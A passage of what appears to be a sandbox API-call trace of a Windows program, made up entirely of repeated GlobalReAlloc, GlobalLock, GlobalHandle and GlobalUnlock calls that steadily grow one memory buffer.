GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c0000, uFlags=0x2) returned 0xcc008c [0269.489] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0269.490] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0269.490] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.490] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c2000, uFlags=0x2) returned 0xcc008c [0269.802] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0269.804] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0269.804] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.804] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c4000, uFlags=0x2) returned 0xcc008c [0269.850] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0269.851] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0269.851] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.851] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c6000, uFlags=0x2) returned 0xcc008c [0269.940] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0269.941] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0269.941] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.941] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1c8000, uFlags=0x2) returned 0xcc008c [0269.989] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0269.990] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0269.990] GlobalUnlock (hMem=0xcc008c) returned 0 [0269.990] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ca000, uFlags=0x2) returned 0xcc008c [0270.056] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.057] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.057] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.057] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1cc000, uFlags=0x2) returned 0xcc008c [0270.105] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.106] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.191] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.191] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ce000, uFlags=0x2) returned 0xcc008c [0270.238] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.239] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.239] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.239] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1d0000, uFlags=0x2) returned 0xcc008c [0270.317] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.318] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.318] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.318] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1d2000, uFlags=0x2) returned 0xcc008c [0270.384] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.385] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.385] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.385] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1d4000, uFlags=0x2) returned 0xcc008c [0270.438] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.440] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.440] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.440] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1d6000, uFlags=0x2) returned 0xcc008c [0270.488] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.490] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.490] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.490] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1d8000, uFlags=0x2) returned 0xcc008c [0270.560] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.561] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.561] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.561] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1da000, uFlags=0x2) returned 0xcc008c [0270.610] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.612] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.612] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.612] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1dc000, uFlags=0x2) returned 0xcc008c [0270.666] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.667] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.667] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.667] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1de000, uFlags=0x2) returned 0xcc008c [0270.726] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.727] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.727] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.727] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e0000, uFlags=0x2) returned 0xcc008c [0270.827] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.828] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.828] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.828] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e2000, uFlags=0x2) returned 0xcc008c [0270.921] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0270.922] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0270.922] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.922] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e4000, uFlags=0x2) returned 0xcc008c [0270.973] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0270.975] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0270.975] GlobalUnlock (hMem=0xcc008c) returned 0 [0270.975] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e6000, uFlags=0x2) returned 0xcc008c [0271.036] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0271.037] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0271.037] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.037] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1e8000, uFlags=0x2) returned 0xcc008c [0271.088] GlobalLock (hMem=0xcc008c) returned 0x5ad0020 [0271.090] GlobalHandle (pMem=0x5ad0020) returned 0xcc008c [0271.090] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.090] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ea000, uFlags=0x2) returned 0xcc008c [0271.448] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0271.449] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0271.449] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.449] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ec000, uFlags=0x2) returned 0xcc008c [0271.501] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0271.503] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0271.503] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.503] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1ee000, uFlags=0x2) returned 0xcc008c [0271.566] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0271.567] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0271.567] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.568] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1f0000, uFlags=0x2) returned 0xcc008c [0271.628] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0271.629] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0271.629] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.629] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1f2000, uFlags=0x2) returned 0xcc008c [0271.708] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0271.709] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0271.709] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.709] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1f4000, uFlags=0x2) returned 0xcc008c [0271.793] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0271.795] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0271.795] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.795] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1f6000, uFlags=0x2) returned 0xcc008c [0271.996] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0271.997] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0271.997] GlobalUnlock (hMem=0xcc008c) returned 0 [0271.997] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1f8000, uFlags=0x2) returned 0xcc008c [0272.058] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.059] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.059] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.059] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1fa000, uFlags=0x2) returned 0xcc008c [0272.150] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0272.152] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0272.153] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.153] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1fc000, uFlags=0x2) returned 0xcc008c [0272.264] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.265] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.265] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.265] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x1fe000, uFlags=0x2) returned 0xcc008c [0272.348] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0272.351] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0272.351] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.351] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x200000, uFlags=0x2) returned 0xcc008c [0272.464] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.466] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.466] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.466] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x202000, uFlags=0x2) returned 0xcc008c [0272.565] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0272.567] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0272.567] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.567] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x204000, uFlags=0x2) returned 0xcc008c [0272.650] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.652] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.652] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.652] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x206000, uFlags=0x2) returned 0xcc008c [0272.766] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0272.768] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0272.768] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.768] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x208000, uFlags=0x2) returned 0xcc008c [0272.837] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.838] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.838] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.838] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x20a000, uFlags=0x2) returned 0xcc008c [0272.899] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0272.901] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0272.901] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.901] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x20c000, uFlags=0x2) returned 0xcc008c [0272.982] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0272.983] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0272.983] GlobalUnlock (hMem=0xcc008c) returned 0 [0272.983] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x20e000, uFlags=0x2) returned 0xcc008c [0273.125] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0273.126] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0273.126] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.126] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x210000, uFlags=0x2) returned 0xcc008c [0273.330] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0273.331] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0273.331] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.331] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x212000, uFlags=0x2) returned 0xcc008c [0273.482] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0273.483] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0273.483] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.484] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x214000, uFlags=0x2) returned 0xcc008c [0273.670] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0273.671] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0273.671] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.671] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x216000, uFlags=0x2) returned 0xcc008c [0273.736] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0273.738] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0273.738] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.738] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x218000, uFlags=0x2) returned 0xcc008c [0273.943] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0273.945] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0273.945] GlobalUnlock (hMem=0xcc008c) returned 0 [0273.945] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x21a000, uFlags=0x2) returned 0xcc008c [0274.179] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0274.180] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0274.180] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.180] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x21c000, uFlags=0x2) returned 0xcc008c [0274.243] GlobalLock (hMem=0xcc008c) returned 0x5ca0020 [0274.244] GlobalHandle (pMem=0x5ca0020) returned 0xcc008c [0274.244] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.244] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x21e000, uFlags=0x2) returned 0xcc008c [0274.373] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0274.374] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0274.374] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.374] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x220000, uFlags=0x2) returned 0xcc008c [0274.745] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0274.746] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0274.746] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.746] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x222000, uFlags=0x2) returned 0xcc008c [0274.801] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0274.802] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0274.802] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.802] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x224000, uFlags=0x2) returned 0xcc008c [0274.961] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0274.962] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0274.962] GlobalUnlock (hMem=0xcc008c) returned 0 [0274.962] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x226000, uFlags=0x2) returned 0xcc008c [0275.023] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0275.024] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0275.024] GlobalUnlock (hMem=0xcc008c) returned 0 [0275.024] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x228000, uFlags=0x2) returned 0xcc008c [0275.378] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0275.379] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0275.379] GlobalUnlock (hMem=0xcc008c) returned 0 [0275.379] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x22a000, uFlags=0x2) returned 0xcc008c [0275.515] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0275.516] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0275.516] GlobalUnlock (hMem=0xcc008c) returned 0 [0275.516] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x22c000, uFlags=0x2) returned 0xcc008c [0275.584] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0275.585] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0275.585] GlobalUnlock (hMem=0xcc008c) returned 0 [0275.585] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x22e000, uFlags=0x2) returned 0xcc008c [0275.746] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0275.748] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0275.748] GlobalUnlock (hMem=0xcc008c) returned 0 [0275.748] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x230000, uFlags=0x2) returned 0xcc008c [0276.195] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0276.196] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0276.197] GlobalUnlock (hMem=0xcc008c) returned 0 [0276.197] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x232000, uFlags=0x2) returned 0xcc008c [0276.269] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0276.512] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0276.512] GlobalUnlock (hMem=0xcc008c) returned 0 [0276.512] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x234000, uFlags=0x2) returned 0xcc008c [0276.579] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0276.580] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0276.580] GlobalUnlock (hMem=0xcc008c) returned 0 [0276.580] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x236000, uFlags=0x2) returned 0xcc008c [0276.968] GlobalLock (hMem=0xcc008c) returned 0x57f0020 [0276.969] GlobalHandle (pMem=0x57f0020) returned 0xcc008c [0276.969] GlobalUnlock (hMem=0xcc008c) returned 0 [0276.969] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x238000, uFlags=0x2) returned 0xcc008c [0277.315] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0277.316] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0277.317] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.317] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x23a000, uFlags=0x2) returned 0xcc008c [0277.384] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0277.385] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0277.385] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.385] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x23c000, uFlags=0x2) returned 0xcc008c [0277.524] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0277.525] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0277.525] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.525] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x23e000, uFlags=0x2) returned 0xcc008c [0277.610] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0277.612] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0277.612] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.612] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x240000, uFlags=0x2) returned 0xcc008c [0277.684] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0277.686] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0277.686] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.686] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x242000, uFlags=0x2) returned 0xcc008c [0277.766] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0277.767] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0277.767] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.767] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x244000, uFlags=0x2) returned 0xcc008c [0277.881] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0277.882] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0277.882] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.882] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x246000, uFlags=0x2) returned 0xcc008c [0277.950] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0277.951] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0277.951] GlobalUnlock (hMem=0xcc008c) returned 0 [0277.951] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x248000, uFlags=0x2) returned 0xcc008c [0278.088] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.089] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.089] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.089] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x24a000, uFlags=0x2) returned 0xcc008c [0278.168] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.169] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.169] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.169] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x24c000, uFlags=0x2) returned 0xcc008c [0278.230] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.231] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.232] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.232] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x24e000, uFlags=0x2) returned 0xcc008c [0278.309] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.310] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.310] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.310] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x250000, uFlags=0x2) returned 0xcc008c [0278.384] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.385] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.385] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.385] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x252000, uFlags=0x2) returned 0xcc008c [0278.466] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.467] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.467] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.467] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x254000, uFlags=0x2) returned 0xcc008c [0278.534] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.535] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.535] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.535] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x256000, uFlags=0x2) returned 0xcc008c [0278.618] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.629] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.629] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.629] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x258000, uFlags=0x2) returned 0xcc008c [0278.691] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.692] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.692] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.692] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x25a000, uFlags=0x2) returned 0xcc008c [0278.766] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.767] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.767] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.767] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x25c000, uFlags=0x2) returned 0xcc008c [0278.841] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.842] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.842] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.842] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x25e000, uFlags=0x2) returned 0xcc008c [0278.904] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0278.905] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0278.905] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.905] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x260000, uFlags=0x2) returned 0xcc008c [0278.983] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0278.984] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0278.984] GlobalUnlock (hMem=0xcc008c) returned 0 [0278.984] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x262000, uFlags=0x2) returned 0xcc008c [0279.079] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0279.081] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0279.081] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.081] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x264000, uFlags=0x2) returned 0xcc008c [0279.151] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0279.152] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0279.152] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.152] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x266000, uFlags=0x2) returned 0xcc008c [0279.262] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0279.263] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0279.263] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.263] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x268000, uFlags=0x2) returned 0xcc008c [0279.382] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0279.383] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0279.383] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.383] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x26a000, uFlags=0x2) returned 0xcc008c [0279.456] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0279.457] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0279.457] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.457] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x26c000, uFlags=0x2) returned 0xcc008c [0279.578] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0279.579] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0279.579] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.579] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x26e000, uFlags=0x2) returned 0xcc008c [0279.691] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0279.692] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0279.692] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.693] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x270000, uFlags=0x2) returned 0xcc008c [0279.767] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0279.768] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0279.768] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.768] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x272000, uFlags=0x2) returned 0xcc008c [0279.881] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0279.895] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0279.895] GlobalUnlock (hMem=0xcc008c) returned 0 [0279.895] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x274000, uFlags=0x2) returned 0xcc008c [0280.009] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.010] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.010] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.010] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x276000, uFlags=0x2) returned 0xcc008c [0280.086] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.087] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.088] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.088] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x278000, uFlags=0x2) returned 0xcc008c [0280.201] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.202] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.202] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.202] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x27a000, uFlags=0x2) returned 0xcc008c [0280.255] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.256] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.256] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.256] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x27c000, uFlags=0x2) returned 0xcc008c [0280.320] GlobalLock (hMem=0xcc008c) returned 0x5c20020 [0280.321] GlobalHandle (pMem=0x5c20020) returned 0xcc008c [0280.322] GlobalUnlock (hMem=0xcc008c) returned 0 [0280.322] GlobalReAlloc (hMem=0xcc008c, dwBytes=0x27e000, uFlags=0x2) returned 0xcc008c [0280.377] GlobalLock (hMem=0xcc008c) returned 0x5fc0020 [0280.378] GlobalHandle (pMem=0x5fc0020) returned 0xcc008c [0280.378] 